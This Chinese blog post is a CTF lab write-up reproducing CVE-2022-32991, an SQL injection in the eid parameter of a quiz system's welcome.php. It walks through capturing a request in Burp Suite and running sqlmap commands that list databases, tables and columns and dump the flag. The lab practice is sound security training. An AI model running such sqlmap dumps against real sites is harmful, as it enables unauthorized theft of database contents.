CVE-2022-32991靶场复现

最新推荐文章于 2024-03-25 23:13:52 发布
置顶 最新推荐文章于 2024-03-25 23:13:52 发布
阅读量653 收藏 4
点赞数 4
分类专栏: CTF做题笔记 文章标签: 网络安全 web安全 运维 sql linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73734159/article/details/134083293
版权

靶场环境:
image.png

题目提示了该CMS的welcome.php中存在SQL注入攻击。

CVE官方给出的提示:
image.png

welcome.php页面存在SQL注入,并且这个参数是eid

打开靶场环境:
image.png

页面是一个登陆注册的界面

用户注册:
image.png

1
01@0.com
123456
123456
点击Register(注册)
注册成功

用户登录:
image.png

01@0.com
123456
点击Login(登录)

登陆成功:
image.png

箭头所指方向存在welcome.php文件但是参数不是eid,而是p
下方有Start开始按钮,点点试试,看看有没有新的发现

image.png
image.png

存在了eid参数
由于没有注入窗口,所以想到了,火狐+burpsuite+sqlmap组合拷打

复制带有eid参数的页面网址,用火狐浏览器打开,进行burpsuite抓包
image.png
image.png
创建一个txt文件,将数据包复制到这个txt文件里面
image.pngimage.png
注入前的准备工作,了解sqlmap的部分参数

  1. -r 加载文件中的HTTP请求(本地保存的请求包txt文件)
  2. -D 选择使用哪个数据库
  3. -T 选择使用哪个表
  4. -C 选择使用哪个列
  5. –dbs 列出所有的数据库
  6. –batch 自动选择yes
  7. –tables 列出当前的表
  8. –columns 列出当前的列
  9. –dump 获取字段中的数据

启动sqlmap加载flag.txt文件HTTP请求并列出其所有数据库
进入到桌面目录下(注意这是我的flag.txt文件保存的位置)
执行如下命令:
sqlmap -r flag.txt --dbs --batch
回显如下:
image.png
可以看到存在数据库ctf(注意执行命令后,加载可能会慢点,不必慌张。)
接下来列出数据库ctf里面的所有数据表
执行如下命令:
sqlmap -r flag.txt -D ctf --tables --batch
回显如下:
image.png
image.png
可以看到数据库ctf里面存在数据表flag,猜测数据表flag里面存在flag(严谨一点)
接着爆数据表flag里面的字段
执行如下命令:
sqlmap -r flag.txt -D ctf -T flag --columns --batch
回显如下:
image.png
数据表flag里面存在字段flag
最后爆flag字段里面的内容
执行如下命令:
sqlmap -r flag.txt -D ctf -T flag -C flag --dump --batch
回显如下:
image.png
得出flag:
flag{cdadbe80-6b13-4ce7-bd86-3ff050dd36d3}

白猫a~
关注
  • 4
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CVE-2022-22963 复现Demo
04-14
CVE-2022-22963 复现Demo,A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it. 存在任何使用问题可以私信本人。
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
05-05
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
CVE-2022-32991
最新发布
sinat_25635183的博客
03-25 318
2、CVE-2022-32991Web Based Quiz System v1.0版本中存在的SQL注入漏洞,该漏洞源于welcome.php中的eid参数缺少对外部输入SQL语句的验证。但是提示sqlmap的版本过时了, "your sqlmap version is outdated",那么就意味着你当前使用的 sqlmap版本可能已经不是最新版本,建议你及时更新到最新版本以确保工具的效用和安全性。使用sqlmap工具(本人使用的是kali下的sqlmap)猜测数据库为:ctf。
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version<3.0.3 3.1.1<Apache spark 版本<3.1.2 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: https://spark.apache.org/downloads.html 2.安全设备路径添加黑名单或者增加WAF规则(临时方案)。
Microsoft Exchange CVE-2022-41040 & CVE-2022-41082 Nmap检测脚本
10-03
CVE-2022-41040 Microsoft Exchange Server权限提升漏洞 和 CVE-2022-41082 Microsoft Exchange Server 远程执行代码漏洞 Nmap漏洞检测脚本 使用发发: -- @usage -- nmap --script proxynotshell_checker.nse -p443 <host>
【春秋云境】CVE-2022-32991
ZXW_NUDT的博客
02-22 2503
【春秋云境】CVE-2022-32991
【春秋云境】CVE-2022-32991靶场WP
果粒程
11-25 402
【春秋云境】CVE-2022-32991靶场WP
Web Based Quiz System SQL注入漏洞复现CVE-2022-32991
千寻的博客
11-25 1035
`Sourcecodester Web Based Quiz System`是 (`Sourcecodester`)开源的一个应用软件。用于一个简单的在线基础的项目。 `Web Based Quiz System v1.0`版本存在安全漏洞,该漏洞源于通过` welcome.php `中的`eid` 参数发现存在 SQL 注入漏洞。该CMS的welcome.php中存在SQL注入攻击。
春秋云镜.com 免费空间系列(1) CVE-2022-32991
陈学卫的博客
07-27 310
今天看到一个很好的在线靶场平台地址春秋云镜.com,里边有很多的免费的cve漏洞,从今天起,将更新一个春秋云镜免费空间系列,一个一个攻克cve的漏洞自此,迈出了攻防小白的第一步。这个主要考用户的sqlmap的一些命令和用法,熟练掌握sqlmap是我们成长的第一步。
春秋云境靶场CVE-2022-32991漏洞复现(sql手工注入)
zyh1588的博客
11-14 1023
小白复现CVE-2022-32991漏洞,该CMS的welcome.php中存在SQL注入攻击......
春秋云境:CVE-2022-32991
一只爱吃橙子的羊
11-29 856
Web Based Quiz System SQL注入漏洞:CVE-2022-32991
CVE-2022-32991 Web Based Quiz System SQL注入
qq_38733240的博客
11-19 637
Web Based Quiz System 1.0中曾发现一漏洞,此漏洞被分类为致命。受影响的是未知功能文件:welcome.php。手动调试的软件参数:eid不合法输入可导致 SQL注入。
春秋云境:CVE-2022-32991SQL注入)
m0_65712192的博客
04-12 1566
该CMS的welcome.php中存在SQL注入攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

白猫a~

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值